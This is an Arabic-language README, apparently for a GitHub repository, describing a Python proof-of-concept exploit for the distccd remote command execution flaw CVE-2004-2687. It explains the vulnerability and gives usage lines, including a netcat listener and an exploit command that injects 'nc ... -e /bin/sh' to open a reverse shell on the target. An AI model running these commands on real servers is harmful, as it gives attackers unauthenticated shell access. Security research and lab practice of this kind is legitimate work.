
أداة استغلال إثبات المفهوم مبنية بلغة Python لثغرة تنفيذ التعليمات البرمجية عن بعد CVE-2004-2687 في distccd، مما يتيح وصولاً غير مصادق عليه إلى الصدفة على الخوادم الضعيفة.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ الترقية إلى Python3
نظرة عامة
يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال الثغرة الأمنية في distccd والمعروفة باسم CVE-2004-2687. توجد الثغرة في البرنامج الخفي distccd، وهو جزء من نظام الترجمة الموزعة distcc للغات C/C++. عند تكوينه بشكل غير صحيح، يسمح distccd للمهاجمين عن بُعد بتنفيذ أوامر عشوائية على الخادم دون أي مصادقة.
تفاصيل الثغرة
صُمم distcc لتوزيع مهام الترجمة عبر أجهزة متعددة لتسريع عملية البناء. ومع ذلك، إذا لم يتم تأمين البرنامج الخفي distccd بشكل صحيح، فإنه يُظهر ثغرة تنفيذ الأوامر عن بُعد (RCE). يحدث ذلك لأن البرنامج الخفي يستمع على منفذ شبكة ويقبل الأوامر من أي عميل، مما يسمح لهم بتنفيذ أوامر شل على الخادم كمستخدم يدير البرنامج الخفي.
تم تعيين الثغرة CVE-2004-2687 وتؤثر على إصدارات distccd قبل 3.1. عند استغلالها، يمكن للمهاجم الحصول على وصول شل إلى الجهاز المعرض للخطر، مما يؤدي إلى احتمالية اختراق النظام بأكمله.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
الثغرة :

الاستغلال :
